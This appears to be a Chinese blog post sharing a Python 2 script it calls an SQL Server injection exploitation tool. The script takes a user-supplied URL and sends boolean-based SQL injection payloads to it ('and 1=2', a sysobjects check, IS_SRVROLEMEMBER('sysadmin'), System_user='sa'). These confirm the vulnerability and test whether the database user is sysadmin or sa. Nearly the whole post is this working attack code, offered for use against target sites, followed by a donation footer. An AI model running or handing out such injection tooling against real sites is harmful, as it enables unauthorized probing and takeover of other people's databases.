本文講述一個(gè)用Python寫的小程序,用于有注入點(diǎn)的鏈接,以檢測(cè)當(dāng)前數(shù)據(jù)庫用戶是否為sa,詳細(xì)代碼如下:
# Code by zhaoxiaobu Email: little.bu@hotmail.com
#-*- coding: UTF-8 -*-
from sys import exit
from urllib import urlopen
from string import join,strip
from re import search
def is_sqlable():
sql1="%20and%201=2"
sql2="%20and%201=1"
urlfile1=urlopen(url+sql1)
urlfile2=urlopen(url+sql2)
htmlcodes1=urlfile1.read()
htmlcodes2=urlfile2.read()
if not search(judge,htmlcodes1) and search(judge,htmlcodes2):
print "[信息]恭喜!這個(gè)URL是有注入漏洞的!n"
print "[信息]現(xiàn)在判斷數(shù)據(jù)庫是否是SQL Server,請(qǐng)耐心等候....."
is_SQLServer()
else:
print "[錯(cuò)誤]你確定這個(gè)URL能用?換個(gè)別的試試吧!n"
def is_SQLServer():
sql = "%20and%20exists%20(select%20*%20from%20sysobjects)"
urlfile=urlopen(url+sql)
htmlcodes=urlfile.read()
if not search(judge,htmlcodes):
print "[錯(cuò)誤]數(shù)據(jù)庫好像不是SQL Server的!n"
else:
print "[信息]確認(rèn)是SQL Server數(shù)據(jù)庫!n"
print "[信息]開始檢測(cè)當(dāng)前數(shù)據(jù)庫用戶權(quán)限,請(qǐng)耐心等待......"
is_sysadmin()
def is_sysadmin():
sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
print "[錯(cuò)誤]當(dāng)前數(shù)據(jù)庫用戶不具有sysadmin權(quán)限!n"
else:
print "[信息]當(dāng)前數(shù)據(jù)庫用戶具有sysadmin權(quán)限!n"
print "[信息]檢測(cè)當(dāng)前用戶是不是SA,請(qǐng)耐心等待......"
is_sa()
def is_sa():
sql = "%20and%20'sa'=(select%20System_user)";
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
print "[錯(cuò)誤]當(dāng)前數(shù)據(jù)庫用戶不是SA!n"
else:
print "[信息]當(dāng)前數(shù)據(jù)庫用戶是SA!n"
print "n########################################################################n"
print " ^o^SQL Server注入利用工具^o^ "
print " Email: little.bu@hotmail.comn"
print "========================================================================";
url = raw_input('[信息]請(qǐng)輸入一個(gè)可能有注入漏洞的鏈接!nURL:')
if url == '':
print "[錯(cuò)誤]提供的URL必須具有 '.asp?xxx=' 這樣的格式"
exit(1)
judge = raw_input("[信息]請(qǐng)?zhí)峁┮粋€(gè)判斷字符串.n判斷字符串:")
if judge == '':
print "[錯(cuò)誤]判斷字符串不能為空!"
exit(1)
is_sqlable()
更多文章、技術(shù)交流、商務(wù)合作、聯(lián)系博主
微信掃碼或搜索:z360901061
微信掃一掃加我為好友
QQ號(hào)聯(lián)系: 360901061
您的支持是博主寫作最大的動(dòng)力,如果您喜歡我的文章,感覺我的文章對(duì)您有幫助,請(qǐng)用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點(diǎn)擊下面給點(diǎn)支持吧,站長(zhǎng)非常感激您!手機(jī)微信長(zhǎng)按不能支付解決辦法:請(qǐng)將微信支付二維碼保存到相冊(cè),切換到微信,然后點(diǎn)擊微信右上角掃一掃功能,選擇支付二維碼完成支付。
【本文對(duì)您有幫助就好】元
